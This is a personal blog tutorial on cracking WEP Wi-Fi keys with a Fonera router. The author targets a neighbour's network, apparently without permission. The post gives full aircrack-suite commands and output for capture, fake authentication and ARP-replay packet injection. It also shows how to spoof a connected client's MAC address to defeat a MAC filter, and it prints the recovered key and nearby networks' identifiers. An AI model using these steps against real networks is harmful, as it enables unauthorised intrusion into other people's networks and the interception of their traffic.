Hackviking He killed Chuck Norris, he ruled dancing so he took up a new hobby…

5Apr/100

WEP Cracking with Fon (Fonera) router

I usually use my Fon router when doing the collection work for wlan cracking. I recently moved to a new apartment in my hometown and this is what I call a target rich environment! 15 wlans with good power right at my desktop. That is just to good to be true! So here is a little run down on how to do this easily. This guide can also be used for any other hardware but it has some special info just for the fonera.

Here are a guide to cracking your fonera router:
http://dltv.wordpress.com/off-the-wall/a-guide-to-hacking-the-la-fonera-wireless-router/
And here is the firmware I use: http://www.dd-wrt.com/site/index

So now you have a linux computer for your pocket, much like your iPhone if you have one. The big differnece is that this linux pocket computer is great for wlan use. First start an SSH session to the router and login.

We need to setup the wlan card for our use. If your connected via the "Legend" wlan you have to keep that. I prefer to connect via cable to the router and then destroy the "Legend" network before I begin (wlanconfig ath0 destroy). But even if you destroy that you can run the rest of the guide with ath1.

So lets begin the real thing!

First create a wlan instance in monitor mode so we can listen to the world around us.

wlanconfig ath1 create wlandev wifi0 wlanmode monitor

Then we want a list of networks around us that we can attack. With airodump-ng without any parameters we can get a list of wlans available for us.

airodump-ng ath1

The router respondse with a list of networks and information about encryption and you can also see a list of clients that the card picks up.
In the list below no clients are seen but the usually show up, this is just a quick scan I did to show the prinicple. When you have your list just it CTRL + C to get back to the prompt.

CH 10 ][ Elapsed: 8 s ][ 2000-01-01 15:56

BSSID              PWR  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:22:15:57:A6:78    1        2        0     0   1  54  WPA  CCMP   PSK  Emelie
00:1B:2F:DC:C3:4E    0        2        0     0   6  54. WPA  TKIP   PSK  M&C
00:1C:DF:04:DD:20   11        4        0    0  13  54. WPA2 CCMP   PSK  MILKYWAY
00:18:4D:8C:52:0E   15       16        0    0   3  54. WEP  WEP         MAD
00:26:5A:30:34:50   15       19        0    0   6  48. WEP  WEP         Ferdinand
00:24:8C:27:63:DC   11        5        0    0   1  54  WPA  TKIP   PSK  66b013

BSSID              STATION            PWR  Lost  Packets  Probes

My unlucky neighbor that has chosen to call his/hers wlan for MAD will be todays target. I selected this becuase it's MAC controlled. If the correct MAC aren't in the routers "Allowed list" or "White list" I will be unable to connect. To be able to handle the amount of data that I need to collect to be able to crack the WEP key I need to connect a share to the FON router. In this case I will connect the FON to a share I put up on my Windows 7 box. First you need create an account on you windows box that doesn't have spaces in it and select a password for that account. Then share a folder and give read/write access to that account. Then mount it onto your FON router.

In the /mnt folder run the command:

mkdir share

Then mount the share to that folder like this:

mount -t cifs //<IP TO THE WINDOWS BOX>/<SHARE NAME>; -o username=<USERNAME>,password=<PASSWORD> /mnt/share

Now we can start to collect information about the network in question. Start airodump-ng to listen to the wlan.

airodump-ng -c 3 --bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1

So what have we done now? We provided airodump-ng with some importent information:

-c3

We told it to listen to channel 3 only. If we omit this parameter it will hop up and down the channels.

--bssid 00:18:4D:8C:52:0E

We supplied the MAC address of the wlan base so it knows what to listen for.

-w /mnt/share/MAD

W stands for "Write" we want airodump-ng to dump the information into the file MAD on the Windows box share.

ath1

What wlan instance to use.

The router will also show us the information in real time while it collects the IV's (inital vectors) that we need for the crack.

CH  3 ][ Elapsed: 55 s ][ 2000-01-01 16:00

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID

00:18:4D:8C:52:0E   19   1      475        2    0   3  48. WEP  WEP         MAD

BSSID              STATION            PWR  Lost  Packets  Probes

00:18:4D:8C:52:0E  00:22:43:6E:BD:F5   10     0        5

Now you can see the client that is connected as well. When I started attacking this network I didn't know it had a MAC filter running but I found out pretty quick when I couldn't associate with it or authenticate with it. If you can't do an association like the one below or if packet injection fails (it's not sending any packets) you probable is talking to a MAC filtered router. So how do we solve this issue? We fake our MAC!

If you have no problem associating with the station like below you can skip this step.

aireplay-ng -1 0 -e "MAD" -a 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1
16:01:19  Waiting for beacon frame (BSSID: 00:18:4D:8C:52:0E)
16:01:19  Sending Authentication Request
16:01:19  Authentication successful
16:01:19  Sending Association Request
16:01:19  Association successful 🙂

So what did I try here? I did a "Fake Authentication" against the router to so if it allows me to connect. Please note that the -h (my client MAC is the same as the client I found earlier).
In this screen shoot I have all ready faked my MAC to be able to connect to the router. I didn't save any screen shoot of the failure. I quick run down of the command above:

-1

Fake Authentication attack

0

How often to send a Authentication/Association Request (depending on the router you will be dropped after a while and need to re-authenticate)

-e "MAD"

The SSID of the router.

-a  00:18:4D:8C:52:0E

The MAC address of the router.

-h  00:22:43:6E:BD:F5

The MAC address of the client. In this case a spoofed one to get around the MAC filter but in all other cases you can use you original MAC or just 1:2:3:4:5:6

>ath1

The wlan instance to use.

So this raises two questions. First how do you get your MAC?

ifconfig

This command will show you all the info on all the network devices you have and you can extract the MAC address of the wifi0 in this case.
Second question how do I spoof my MAC?

ifconfig wifi0 down
ifconfig wifi0 hw ether 00:22:43:6E:BD:F5
ifconfig wifi0 up

Now we have changed the MAC address of the card to what we want/need. In some cases it can give you an error like "Device Not Ready".
Just try to destroy all the athX instances before you take the wifi0 off-line and you will probably succeed.

Now we can access the network to do our thing so let's get to it. If you had to destroy ath1 when you reset your MAC then just create it again as we did before.
Then start the airodump-ng with the file write option again:

airodump-ng -c 3 --bssid 00:18:4D:8C:52:0E -w /mnt/share/MAD ath1

Then start a second SSH client and connect to the FON and login again. Now we will help the process along big time! The data column in the scan result (first window/session) needs to go up to 250.000 for us to be able to crack a 128bit key and over 800.000 for heavier keys. You can collect all that data by just listening to the traffic but it will take days or even weeks. We can do it much quicker our selfs. In the second window/session we will start a packet injection attack of the ARP kind. In short ARP is a way for network gear to keep track of witch device have witch IP address and MAC address combination. Every time we send an ARP request the router will respond with a new IV (initial vector) and that's what we count as data so and then use to crack the key. So let's get the IV's coming!

aireplay-ng -3 -b 00:18:4D:8C:52:0E -h 00:22:43:6E:BD:F5 ath1

This will start sending packets in large numbers. The FON can send about 40-50 packets per second. Thanks to the fact that we changed our MAC we will now get our traffic through. If you see the "packets sent" counter stopping that usually just that you lost you association with the router. Just hit CTRL + C and run the "Fake Authentication" attack again. If this happens over and over again set the -1 0 to something like -1 20 and it will re-associate every 20 seconds. If you need to do that just open a third window/session so you can have it all running at once.

Once we collected enough IV's we can start cracking. I usually start the cracking process on the file before the collection is done. If you do so it will start the process and if no key is found restart the crack every 5.000 IV's collected. How ever this is not a job for the FON due to it's limited processing power. I usually use my linux box or my windows box where I have more computing power. The windows box is easy, there is a GUI, so if you made it this far you will be able to figure that out. The command line to do this is:

aircrack-ng c:\temp\fonera\mad_mac-01.cap

The result will be something like this:

Aircrack-ng 1.0

[00:00:00] Tested 717 keys (got 171180 IVs)

KB    depth   byte(vote)
0    0/  9   04(225280) 02(190208) 0D(189952) C2(188160) 5A(185088)
1    0/  1   E5(245504) 33(187648) F3(187392) FE(185344) 32(185088)
2    0/  1   9E(234496) C4(188928) 1C(188160) 3B(187648) 5D(185344)
3   26/  3   56(179200) 46(178944) A1(178944) 81(178944) 2D(178688)
4    6/  4   09(185344) 39(185088) 93(183808) E5(182528) 60(182528)

KEY FOUND! [ 04:E4:9E:18:F7:8A:01:11:DF:97:6D:1A:5A ]
Decrypted correctly: 100%

As you can see I only needed little over 170.000 IV's to do this and when the crack was successful I could stop the attack on the network.
So now we have the key:

04:E4:9E:18:F7:8A:01:11:DF:97:6D:1A:5A

People who get this far still ask me a question, "How do I use that key from windows?"
The routers accepts both ASCII phrases and hex keys like the one above. Just remove the : from the key and windows will be able to connect to the network.

Posted by Kristofer Källsbo

Comments (0) Trackbacks (0)

No comments yet.


Leave a Reply

No trackbacks yet.